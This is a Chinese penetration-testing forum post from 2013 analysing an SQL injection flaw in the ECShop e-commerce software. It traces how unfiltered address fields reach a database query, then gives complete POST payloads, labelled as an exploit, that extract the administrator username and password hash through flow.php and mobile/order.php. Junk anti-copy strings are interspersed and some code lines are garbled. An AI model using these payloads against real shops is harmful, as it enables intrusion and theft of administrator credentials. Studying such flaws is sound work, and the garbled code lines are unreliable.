中国网络渗透测试联盟

标题: ecshop全版本注入分析 [打印本页]

---

作者: admin    时间: 2013-1-13 09:48
标题: ecshop全版本注入分析
前段时间大概2012年圣诞节左右，在t00ls上看见ecshop全版本注入，当时也下载了最新的程序分析了下,最近考试比较忙，今天刚考完，把我分析的记录下来。
6 s, c. Y2 J9 ]* F
" _% W: W* M1 P' K" @; X    漏洞关键文件：
3 l8 J! H' G0 p! k: }
& u  a! @& g; D6 B    /includes/lib_order.php

% k  S9 h; u5 q% f( H5 j. H8 S    关键函数：



1 S( X7 L- @3 x' v9 M0 y; F- I01     function available_shipping_list($region_id_list)
1 }2 Z" Q  I% n# c
/ J9 e' i3 X( E' R: \6 }02 {
1 O5 i5 I; m- f% u: j5 X
) c! _, i% f* N; i2 v' E1 E03     $sql = 'SELECT s.shipping_id, s.shipping_code, s.shipping_name, ' .

, f! @7 j$ {6 ~& B6 [2 p) |) X04                 's.shipping_desc, s.insure, s.support_cod, a.configure ' .
' k. M" V& v. c& G9 o
05             'FROM ' . $GLOBALS['ecs']->table('shipping') . ' AS s, ' .

06                 $GLOBALS['ecs']->table('shipping_area') . ' AS a, ' .

  y! Q/ l& ?6 o# T/ S- F8 c* Q: S07                 $GLOBALS['ecs']->table('area_region') . ' AS r '.

08             'WHERE r.region_id ' . db_create_in($region_id_list) .

7 ~5 l1 d4 m7 c5 E" @* w, p  S& P; F09             ' AND r.shipping_area_id = a.shipping_area_id AND a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order';

10   

5 V& W( s; K! Z; d- Q11     return $GLOBALS['db']->getAll($sql);

12 }

# h8 x8 I6 d5 r显然对传入的参数没有任何过滤就带入了查询语句。

" g: E0 f0 o8 W  C下面我们追踪这个函数在flow.php中：
8 R$ H$ c' e; r+ g 第531行：   
3 V8 T, Z% Z, {8 D3 ]2 j1 c
& L/ e9 y. c% S1 k5 N" `7 F) _" W1 $shipping_list     = available_shipping_list($region);



: p. ?2 c! O& Y. ~4 q
9 [3 K2 c. h; o  J
再对传入变量进行追踪：

" A7 x9 U/ l; j7 E) W% H+ b3 }第530行：   

1 $region = array($consignee['country'], $consignee['province'],$consignee['city'], $consignee['district']);
3 f7 h! Y% f9 x4 J8 k1 p

6 U. B4 U3 R  g" G/ h
; A( ^2 A. x# U
$ s: H/ H0 Y& }# T
+ G3 R8 |6 n- B, t# _第473行：        
) w/ s4 X- @" x- H/ {5 _1 f
1 $consignee = get_consignee($_SESSION['user_id']);
# B0 R% p+ g9 `& I% m
到了一个关键函数：
: ]" x/ O5 ?- Q/ e5 X, L/ b
/includes/lib_order.php

7 Y" Q; m0 X+ O+ z% M1 v
! V5 p/ s+ u  a4 z" Z5 u' i4 H6 s
5 Y6 \5 }+ {& F) h/ |! y; T( M% {6 P
* \5 _% l1 k- d& D0 b9 _
01 function get_consignee($user_id)
: i) _: X) P3 `# X* V- A
5 `/ M2 u2 f+ Q02 {
( Z1 T8 |9 g# x) ^8 Z+ w' o& X$ o
. I, F' E& P8 c/ h/ C8 E+ o03     if (isset($_SESSION['flow_consignee']))

+ @2 S( w4 g: Y/ }# y9 o$ |$ F04     {
: P6 o1 \. q  p9 R
( B/ L6 Z4 P  B) a, M* C0 Q05         /* 如果存在session，则直接返回session中的收货人信息 */
4 }( k! N" }  w( g. p0 t0 R
06   

9 m- ^9 P5 }0 f1 t- x5 H  `07         return $_SESSION['flow_consignee'];
; X5 F, d0 y5 x
. P  J2 y% I" t9 G08     }

* ?" Z6 ^+ U, A+ {3 J09     else
8 l! m! `. L) G4 u( J* R" M
10     {

11         /* 如果不存在，则取得用户的默认收货人信息 */

12         $arr = array();

13   

( Q3 c0 F1 F. M  m, g; f14         if ($user_id > 0)

15         {
) Q- H" Z* i  o- F( G" G$ P
16             /* 取默认地址 */
. H% Z  d, E( F. F7 L4 n' U
17             $sql = "SELECT ua.*".
# |( k, _6 R5 V. R
& O, r  u2 h4 k: W) V( j18                     " FROM " . $GLOBALS['ecs']->table('user_address') . "AS ua, ".$GLOBALS['ecs']->table('users').' AS u '.
% }/ Q, h" P- b: C. P) F+ W
19                     " WHERE u.user_id='$user_id' AND ua.address_id = u.address_id";
* o3 J) t1 K& l, \9 Z4 q  e$ z; q$ T; u
20   
( m& I) ]8 i1 I) t0 a  K
21             $arr = $GLOBALS['db']->getRow($sql);
- Y) m# ], L& P$ t
22         }

, H: Y- H5 W  e* c2 D2 Z0 I. p23   

* `) x! W+ a4 E2 u) }8 j! h% F5 G24         return $arr;

3 M% [+ P/ p5 a) {9 z2 P25     }

26 }
, [3 m  S3 o/ I, ~1 ?, j8 i- M9 T
% O! K# S. X& d7 m# @$ N$ ^显然如果 isset($_SESSION['flow_consignee']存在就直接使用。到底存不存在呢？


2 b" {; a  y9 H' O9 p3 Z5 v
关键点:

第400行：    $_SESSION['flow_consignee'] = stripslashes_deep($consignee);

这里对传入参数反转义存入$_SESSION中。

7 p6 P. u0 S. B8 X, }+ ?

然后看下：
; F" _7 Q( p% [) X
3 {; v" a* W- s

) O' E4 K. W+ [! w' l   
4 h" D/ W+ V: e( f! I& }
01 $consignee = array(
! P" U5 X1 p6 y  C/ p# t: z
" ^& t% ^2 C0 J4 ~# n" M02         'address_id'    => empty($_POST['address_id']) ? 0  :intval($_POST['address_id']),

8 F5 g# ~  H! }3 g1 e) q2 S03         'consignee'     => empty($_POST['consignee'])  ? '' : trim($_POST['consignee']),

04         'country'       => empty($_POST['country'])    ? '' _POST['country'],
% t& E0 r& m1 l1 R& W& M/ v
05         'province'      => empty($_POST['province'])   ? '' _POST['province'],

# a, m# M2 O' Z06         'city'          => empty($_POST['city'])       ? '' _POST['city'],

07         'district'      => empty($_POST['district'])   ? '' _POST['district'],
* Y5 w( K6 Z7 D4 _) K, D# w
3 Q3 l# w/ @! d( ~  T, j; Q08         'email'         => empty($_POST['email'])      ? '' _POST['email'],

/ n. o$ M+ p) y! ^09         'address'       => empty($_POST['address'])    ? '' _POST['address'],
$ X" A1 m9 ^0 u5 L: w- m
10         'zipcode'       => empty($_POST['zipcode'])    ? '' : make_semiangle(trim($_POST['zipcode'])),

11         'tel'           => empty($_POST['tel'])        ? '' : make_semiangle(trim($_POST['tel'])),
  q) L4 A8 @/ a$ I  A
# {" v: j  Y  r12         'mobile'        => empty($_POST['mobile'])     ? '' : make_semiangle(trim($_POST['mobile'])),

! O9 Q; W( g% c13         'sign_building' => empty($_POST['sign_building']) ? '' _POST['sign_building'],
9 j, {' C% Q1 O
5 n; l! {* j- E14         'best_time'     => empty($_POST['best_time'])  ? '' _POST['best_time'],
$ V! H& C' ?" A5 e4 y
15     );

好了注入就这样出现了。
1 v) |& i! t/ u& `
==================
- z7 K# ]- ^$ g/ k! z
, P8 E. t* O5 t$ m" d注入测试：

环境:windows7+xampp1.7.7(Apache2.2.21+Php 5.3.8+Mysql 5.5.16)

+ [( e2 i! G7 O0 i测试程序：ECShop_V2.7.3_UTF8_release1106
. j- m9 g) C- S7 N$ d/ u


1.首先需要点击一个商品加入购物车
/ i5 T7 }; f/ b0 k
2.注册一个会员帐号

3.post提交数据

" t8 X5 R3 `, |, \8 E

1 http://127.0.0.1/ecshop/flow.php

$ a  b/ X% |5 f  o) ]0 S5 E2   

3 country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=
举一反三，我们根据这个漏洞我们可以继续深入挖掘：

我们搜寻关键函数function available_shipping_list()

在文件/moblie/order.php中出现有，次文件为手机浏览文件功能基本和flow.php相同，代码流程基本相同

利用exp:

1.点击一个商品，点击购买商标

4 ~) z) j( q( X/ Y; i2.登录会员帐号
. F  ^; |2 M5 q8 Z& A" B
  D/ r1 Q4 G7 t% a$ [! r# h1 ~5 s3.post提交：
* ?8 f2 h3 H3 h) O
http://127.0.0.1/ecshop/mobile/order.php
$ V; ^* `9 f2 M) x: x8 ~% a$ K% ]! ]! d
# {9 h- h+ J* F6 l$ K9 f! q
. \; ~% n. _+ e, v, n
) j+ K/ D" r+ S7 \8 V# S  Qcountry=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&&act=order_lise&address_id=
- t) J8 n/ @0 W5 [! F: M
( i  ~" T2 E) R3 G$ f" G. H3 L+ i

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2